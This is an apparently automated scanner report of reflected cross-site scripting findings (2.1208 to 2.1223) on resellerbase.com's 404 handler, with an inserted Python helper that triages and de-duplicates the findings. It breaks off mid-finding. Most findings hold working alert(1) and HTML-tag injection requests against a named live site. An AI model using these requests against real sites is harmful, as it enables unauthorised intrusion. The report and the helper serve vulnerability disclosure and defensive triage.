HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila8a10<script>alert(1)</script>8f6b4773c51/15/iwebtrack-com.html was not found on this server.</p>
...[SNIP]...

2.1208. http://www.resellerbase.com/detail/15/iwebtrack-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/iwebtrack-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14abb<a>3159163c5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/1514abb<a>3159163c5e/iwebtrack-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1514abb<a>3159163c5e/iwebtrack-com.html was not found on this server.</p>
...[SNIP]...

2.1209. http://www.resellerbase.com/detail/15/iwebtrack-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/iwebtrack-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12ca7<script>alert(1)</script>0aa277f541a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/12ca7<script>alert(1)</script>0aa277f541a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/12ca7<script>alert(1)</script>0aa277f541a was not found on this server.</p>
...[SNIP]...
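Every finding in this run of the report (2.1208 through 2.1229) has the same evidence: a 404 response whose body echoes the raw request URI inside <p>The requested URL ... was not found on this server.</p>, regardless of which path segment or query-string name carried the payload. For triage that is one defect in the site's custom 404 handler, not twenty-two separate bugs, and the Firm-confidence entries (the ones where only a bare <a> tag was echoed) are the same sink that the Certain entries prove executes <script>. The helper below is an added example, not part of the XSS.CX report or of the scanner that produced it. It parses findings in this report's own text layout, re-checks each payload against the echoed response line, assigns a confidence the way the report's Confidence column does (raw <script>...</script> reflected is Certain, a bare tag is Firm, an entity-encoded echo is not exploitable), and collapses findings by the response template that echoed them. The two-finding sample text is a constructed abbreviation of 2.1208 and 2.1209 above; the regular expressions assume that layout.

```python
"""Re-verify and de-duplicate reflected-XSS findings from a Burp-style report.

Added example, not the report's or the scanner's code.  The report layout the
parser expects is the one used on this page: a numbered heading with the URL and
the injection point in brackets, a Confidence line, an "Issue detail" sentence
naming the payload, the request line, the status line and the echoed response
line.
"""
import html
import re
from collections import defaultdict

# Constructed sample: findings 2.1208 and 2.1209 from the page, trimmed to the
# lines the parser needs.  Real reports carry many more header lines between them.
SAMPLE_REPORT = """\
2.1208. http://www.resellerbase.com/detail/15/iwebtrack-com.html [REST URL parameter 2]

Confidence:   Firm

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14abb<a>3159163c5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

GET /detail/1514abb<a>3159163c5e/iwebtrack-com.html HTTP/1.1

HTTP/1.0 404 Not Found

<p>The requested URL /detail/1514abb<a>3159163c5e/iwebtrack-com.html was not found on this server.</p>

2.1209. http://www.resellerbase.com/detail/15/iwebtrack-com.html [REST URL parameter 3]

Confidence:   Certain

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12ca7<script>alert(1)</script>0aa277f541a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

GET /detail/15/12ca7<script>alert(1)</script>0aa277f541a HTTP/1.1

HTTP/1.0 404 Not Found

<p>The requested URL /detail/15/12ca7<script>alert(1)</script>0aa277f541a was not found on this server.</p>
"""

# Heading lines may carry trailing navigation text ("previous  next"), hence .*$
FINDING_HEADER = re.compile(r"^(\d+\.\d+)\. (\S+) \[([^\]]+)\].*$", re.MULTILINE)
PAYLOAD_RE = re.compile(r"The payload (.+?) was submitted in")
REQUEST_RE = re.compile(r"^(?:GET|POST) (\S+) HTTP/1\.[01]\s*$", re.MULTILINE)
STATUS_RE = re.compile(r"^HTTP/1\.[01] (\d{3})", re.MULTILINE)
CONFIDENCE_RE = re.compile(r"^Confidence:\s+(\w+)", re.MULTILINE)


def parse_findings(report_text):
    """Split the report into findings and pull out the evidence each one carries."""
    findings = []
    headers = list(FINDING_HEADER.finditer(report_text))
    for i, h in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(report_text)
        chunk = report_text[h.start():end]
        payload = PAYLOAD_RE.search(chunk)
        request = REQUEST_RE.search(chunk)
        status = STATUS_RE.search(chunk)
        confidence = CONFIDENCE_RE.search(chunk)
        if not (payload and request and status):
            continue  # incomplete finding: nothing to re-verify
        # Only lines after the status line belong to the response; the echo is
        # the last of them that still carries the payload.
        body_lines = chunk[status.end():].splitlines()
        echoed = next((ln for ln in reversed(body_lines) if payload.group(1) in ln), "")
        findings.append({
            "id": h.group(1),
            "url": h.group(2),
            "location": h.group(3),
            "reported_confidence": confidence.group(1) if confidence else "?",
            "payload": payload.group(1),
            "request_target": request.group(1),
            "status": int(status.group(1)),
            "echoed_line": echoed.strip(),
        })
    return findings


def classify_reflection(payload, echoed_line):
    """Grade the echo from the evidence alone, mirroring the report's Confidence column."""
    if payload not in echoed_line:
        if html.escape(payload, quote=False) in echoed_line:
            return "Encoded"   # reflected, but as entities: harmless in a text context
        return "Absent"
    if re.search(r"<script>.*</script>", payload, re.IGNORECASE):
        return "Certain"      # a script element reached the page verbatim
    if re.search(r"<[a-z]+>", payload, re.IGNORECASE):
        return "Firm"         # a tag reached the page; script not yet demonstrated
    return "Tentative"


def fingerprint_sink(echoed_line, request_target):
    """Normalise the echo so that findings sharing one template collapse together."""
    return echoed_line.replace(request_target, "{REQUEST_URI}")


def group_by_sink(findings):
    """Map (status code, echo template) -> finding ids: one key per real defect."""
    groups = defaultdict(list)
    for f in findings:
        key = (f["status"], fingerprint_sink(f["echoed_line"], f["request_target"]))
        groups[key].append(f["id"])
    return dict(groups)


def safe_404_body(request_uri):
    """What the 404 handler should emit: the URI entity-encoded for an HTML text context."""
    return "<p>The requested URL %s was not found on this server.</p>" % html.escape(request_uri, quote=True)


def triage(report_text):
    """Parse, re-verify and de-duplicate; returns findings plus the sink grouping."""
    findings = parse_findings(report_text)
    for f in findings:
        f["verified"] = classify_reflection(f["payload"], f["echoed_line"])
    return {"findings": findings, "sinks": group_by_sink(findings)}


if __name__ == "__main__":
    result = triage(SAMPLE_REPORT)
    for f in result["findings"]:
        print(f["id"], f["location"], "reported:", f["reported_confidence"], "verified:", f["verified"])
    for (status, template), ids in result["sinks"].items():
        print(status, template, "->", ", ".join(ids))
```

Run against the full report text, the sink grouping is the deliverable: one key for the 404 template, listing every finding that is really this single unescaped echo of the request URI. The `safe_404_body` function shows the fix the 404 handler needs; feeding its output to `classify_reflection` yields "Encoded" for the same payloads that the live page reflects verbatim.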

2.1210. http://www.resellerbase.com/detail/15/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67df2<script>alert(1)</script>0a4b32dcaab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail67df2<script>alert(1)</script>0a4b32dcaab/15/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail67df2<script>alert(1)</script>0a4b32dcaab/15/rating.php was not found on this server.</p>
...[SNIP]...

2.1211. http://www.resellerbase.com/detail/15/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9dfa1<script>alert(1)</script>d6bd8ca0f5233ce05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail9dfa1<script>alert(1)</script>d6bd8ca0f5233ce05/15/rating.php?id=15&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9dfa1<script>alert(1)</script>d6bd8ca0f5233ce05/15/rating.php?id=15&rating=5 was not found on this server.</p>
...[SNIP]...

2.1212. http://www.resellerbase.com/detail/15/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48da6<script>alert(1)</script>6b71694c4bdf5910b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/1548da6<script>alert(1)</script>6b71694c4bdf5910b/rating.php?id=15&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1548da6<script>alert(1)</script>6b71694c4bdf5910b/rating.php?id=15&rating=5 was not found on this server.</p>
...[SNIP]...

2.1213. http://www.resellerbase.com/detail/15/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7de78<script>alert(1)</script>a47a16896ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/157de78<script>alert(1)</script>a47a16896ec/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/157de78<script>alert(1)</script>a47a16896ec/rating.php was not found on this server.</p>
...[SNIP]...

2.1214. http://www.resellerbase.com/detail/15/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7bdc3<script>alert(1)</script>73c80d205428aceed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/15/rating.php7bdc3<script>alert(1)</script>73c80d205428aceed?id=15&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/rating.php7bdc3<script>alert(1)</script>73c80d205428aceed?id=15&rating=5 was not found on this server.</p>
...[SNIP]...

2.1215. http://www.resellerbase.com/detail/15/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d60a8<script>alert(1)</script>aa50d640fb8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/rating.phpd60a8<script>alert(1)</script>aa50d640fb8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/rating.phpd60a8<script>alert(1)</script>aa50d640fb8 was not found on this server.</p>
...[SNIP]...

2.1216. http://www.resellerbase.com/detail/15/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1c20<script>alert(1)</script>c2da172febf243880 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/15/rating.php/b1c20<script>alert(1)</script>c2da172febf243880?id=15&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/rating.php/b1c20<script>alert(1)</script>c2da172febf243880?id=15&rating=5 was not found on this server.</p>
...[SNIP]...

2.1217. http://www.resellerbase.com/detail/15/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 15806<script>alert(1)</script>edb716f7fc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/rating.php?15806<script>alert(1)</script>edb716f7fc1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/rating.php?15806<script>alert(1)</script>edb716f7fc1=1 was not found on this server.</p>
...[SNIP]...

2.1218. http://www.resellerbase.com/detail/15/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7626d<script>alert(1)</script>03b432bb6e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7626d<script>alert(1)</script>03b432bb6e5/15/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7626d<script>alert(1)</script>03b432bb6e5/15/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1219. http://www.resellerbase.com/detail/15/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a351b<script>alert(1)</script>096e13671 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15a351b<script>alert(1)</script>096e13671/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15a351b<script>alert(1)</script>096e13671/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1220. http://www.resellerbase.com/detail/15/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 53b00<script>alert(1)</script>0e0289ec851 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/search.php53b00<script>alert(1)</script>0e0289ec851?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/search.php53b00<script>alert(1)</script>0e0289ec851?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1221. http://www.resellerbase.com/detail/15/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d1def<a>3546e283e4f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/search.php?keyword=search...&Submit3=Searchd1def<a>3546e283e4f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/search.php?keyword=search...&Submit3=Searchd1def<a>3546e283e4f&opt=2 was not found on this server.</p>
...[SNIP]...

2.1222. http://www.resellerbase.com/detail/15/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c3994<a>be00eccf1ba was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/search.php?keyword=search...c3994<a>be00eccf1ba&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/search.php?keyword=search...c3994<a>be00eccf1ba&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1223. http://www.resellerbase.com/detail/15/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c670a<script>alert(1)</script>3d899d24fbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

